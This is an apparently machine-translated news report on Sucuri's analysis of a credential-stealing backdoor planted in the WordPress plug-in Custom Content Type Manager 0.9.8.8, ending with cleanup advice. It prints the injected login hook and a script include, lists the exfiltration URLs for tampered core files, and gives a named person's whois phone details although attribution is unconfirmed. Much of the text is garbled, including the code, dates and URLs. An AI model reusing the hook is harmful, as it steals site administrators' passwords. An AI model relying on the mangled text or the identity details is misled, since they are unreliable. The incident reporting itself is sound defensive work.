Researchers recently pointed out that a WordPress plug-in (CCTM) has a backdoor that can steal the Administrator account and password.

Researchers recently pointed out that a WordPress plug-in (CCTM) has a backdoor that can steal the Administrator account and password.

It is reported that Sucuri security team researchers recently pointed out that a WordPress plug-in (custom Content Management) has a backdoor in CCTM. Through this backdoor, You can tamper with the core files on WordPress to record and steal the logon accounts and passwords of infected website administrators.
Freebuf encyclopedia
Functions of the Custom Content Type Manager plug-in
Custom content type management (CCTM) allows users to create custom content types (also known as document types), or for each drop-down menu, check box, image, or even other elements, provides standardized custom regions, which provides WordPress content management. This plug-in also allows you to export and import User Content definitions, making it easy to ensure a similar structure between multiple sites.
If you want to add a separate part for your blog to post movie comments. By using a custom Article type, you can create a new article type, just like the post and pages, which can contain a set of different data. For example, new management menus, special editing pages, custom categories, and more practical release management functions. Custom text types have new article management options, just like the default Article types (articles, pages, and attachments. A custom document type can store a variety of information. It has a dedicated editor, multimedia upload, and uses the existing WordPress table structure to facilitate data management.
Backdoor discovery
This incident was first tracked and analyzed by the Sucuri security team (a team dedicated to providing web security services. According to Sucuri security researchers,
At first they found a file named odd (auto-update.php) at their clients, and at first they did not find any suspicious behavior until the plug-in was updated.
The Sucuri Security Team mentioned that when they found a Suspicious File auto-update.php while clearing an infected site for customers, this file is stored in wp-content/plugins/custom-content-type-manager /.. For example,

 
According to research and analysis, the backdoor program can be accessed from an address of http: // wordpresscore. download files from the com/plugins/cctm/update/server and save them. the php format is stored in the plug-in configuration directory.
This plug-in is not only the Custom Content Type Manager (CCTM) mentioned above. In the past three years, this plug-in has been mainly used to create Custom document types and has accumulated a certain number of users, according to preliminary statistics, the plug-in has been installed on more than 10,000 sites.
Plug-in suspect cloud, mysterious Manager
According to a two-week investigation by the Sucuri security team, the plug-in has not been updated in the past 10 months for nearly a year, however, managers have recently changed mysteriously. The new developer named wooranker subsequently updated the plug-in and released a new version.
Every WordPress plug-in we find in the official plug-in directory is upgraded through the sub-version repository. With the help of the problem tracking system, anyone can use this repository to search for the appropriate information (including objects, time and change items) in any version of any plug-in. For example, for recent changes to CCTM,

We can see from the above that one of the changes was the addition of the auto-update.php document in February 18, 2016. In this update, "wooranker" changes and adds the following description information,
"Minor changes to new managers" (retain original syntax)
In fact, from the above, we can see that the plug-in was still updated by fireproofsocks two weeks ago, but one of the subsequent changes is described as "adding wooranker to readme ", after that, it turns into wooranker updating the plug-in.
Maybe the plug-in developer has lost interest in it or is employed by wooranker. On the other hand, because fireproofsocks has not updated the plug-in for nearly a year, we also speculate whether wooranke has intruded the fireproofsocks account, and then added itself as a new manager.
In addition, in February 5, 2016, wooranker was also added to the Postie plug-in project. All changes to the Postie plug-in project are legal and can be queried, and are agreed by the initial initiator of the Postie plug-in. It seems a bit confusing. Next, let's take a look at how the updated malicious CCTM plug-in and wooranker use it to intrude the site.
Malicious Code exists in the Custom Content Management (CCTM) Plug-In 0.9.8.8
The developer assigned a new "mission" to the updated version ". First, the new version, as shown above, adds a auto-update.php file, which, according to research analysis, can be downloaded from a remote server to a infected site.
We can also see through Trac (Last updated on April 9, February 19 ). It adds the/uplodes/CCTM_Communicator.php file (the file will run with the auto-update.php, the main task is to ping the wooranker server so that the server can record information such as the IP address of the newly infected site .) And insert the following code segment into the index. php file of the plug-in.
// Send plugin information when user loginfunction _ encode ($ user_login, $ user) {require_once ('regiondes/CCTM_Communicator.php '); $ _ objCCTMCom = new CCTM_Communicator (); $ _ objCCTMCom-> addInfo (array ($ user_login, $ user); $ _ objCCTMCom-> send_info ();} add_action ('wp _ login', '_ wp_login_eventhandler ', 10, 2 );
Specific changes include,

 
This section of code sends the site and user information to the wooranker server (wordpresscore. com) Whenever a user logs on to the WordPress site.
Attack path Replay
Attackers can trace back attacks by visiting and logging on to infected sites.
On July 6, February 28, an attempt was initiated from the source address 104.131.27.120 to log on to WordPress using the Python script ("python-requests/2.2.1 CPython/2.7.6 Linux/3.20.- 79-generic. The site address is obviously obtained through the new CCTM_Communicator function.
According to monitoring of infected sites, a wooranker attempted to log on to an infected site. However, because the site administrator changed the login URL, wooranker failed to intrude into the site. The attempt to log on was blocked, and wooranker changed the policy. Using a auto-update.php backdoor, it forces the target site to download and install another file named c. php that is primarily used to create another file named wp-options.php. The latter is mainly used to tamper with WordPress core files. According to the study, three files were tampered,

1. wp-login.php, the administrator user login creden1 sent to hxxp: // wordpresscore. com/in/login/index. php;
2. wp-admin/user-new.php, steal New user Login creden; and send them to hxxp: // wordpresscore. com/in/add-user/index. php;
3, wp-admin/user-edit.php, when the user changes the password, steal the relevant login creden., and send it to hxxp: // wordpresscore. com/in/pass-change/index. php.
Some users have automatically updated to the plug-in version with malicious code
These functions have been merged into the CCTM (custom content type management) Plug-in with version 0.9.8.8, and many users have installed the version or automatically updated to their sites.
The hacker tamper with the core WordPress File so that it can control user logon, create and edit commands, and intercept user data before being encrypted, and send the user's plaintext password to the server. In addition, the wp-options.php can even create administrator accounts on infected sites, typically created with support as an account/support@wordpresscore.com as a mailbox.
In summary, wooranker can have an administrator account on all infected sites. When a user accesses the site for logon, The wooranker will be notified of the password used.
What is the real identity of a hacker?
When we analyzed and confirmed the hacker's identity, we also found a change in Plug-in updates. After wooranker obtains the permissions of the plug-in administrator, it first references donutjs (shown on its official website as a js Lightweight Framework) to the mongodes/CCTM. php file.
Wp_enqueue_script ('donutjs', '// donutjs.com/jquery.js ');

 
Maybe for many people, they have hardly heard of donutjs. Even when you search for it on a search engine, there will be no retrieval results of relevant information. According to the analysis and retrieval, I learned from its "Official Website" That donutjs is a lightweight framework mainly to provide support for js application development. According to its official website, it is mainly targeted at jQuery. The following is the official website address (donutjs) and publicity.

Comparison with jQuery syntax, for example
1. Fade out elements and delete them

2. call ajax

After analysis, we found that the information returned by donutjs. com/jquery. js mentioned above is,

This code segment is also used to collect and record site addresses.
Then we found that wooranker still has the permissions of donutjs. com. When we perform whois, the returned results are as follows,
Wordpresscore. com
Created on:
Registered Name: Vishnudath Mangilipudi
Administrator location: Andhra Pradesh
Zip code: 524201
Country where the Administrator is located: IN
Administrator Phone: + 91.8985005295
DNS Server:
NS1.DIGITALOCEAN. COM
NS2.DIGITALOCEAN. COM
NS3.DIGITALOCEAN. COM
Donutjs. com
Registered Name: vishnudath
Country where the Administrator is located: IN
Administrator Phone: + 91.8985005295
In fact, here we can see that donutjs should be the js framework forged by wooranker to help collect site information.
As for information on whois, we can find that the actual owner of wordpresscore. com in malicious code is a developer named Mangilipudi from India. However, the Sucuri security team cannot confirm that Mangilipudi is a hacker behind the scenes, because personal identity information on the Internet can be easily stolen and forged. As wooranker, as previously described, he is also a developer and manager of Postie, another WordPress plug-in. However, Sucuri pointed out that Postie is still managed by the earliest initiators, no malicious code was found. Therefore, the real identities of hackers are still being analyzed.
Suggestions
1. Disable the CCTM plug-in;
2. Check all the core WordPress files. Of course, in addition to re-installing WordPress, you should at least check whether the following three files have been tampered with. We can obtain the initial files from the following address, click wordpress.org;
(1)./wp-login.php
(2)./wp-admin/user-edit.php
(3)./wp-admin/user-new.php
3. Modify the passwords of all users on WordPress;
4. Delete unrecognized user accounts on WordPress, especially those that contain [email protected]. com mailbox information.
5. If you really need to maintain the CCTM plug-in on the site, we recommend that you use stable version 0.9.8.6 (version 0.9.8.7 has detected a security vulnerability ).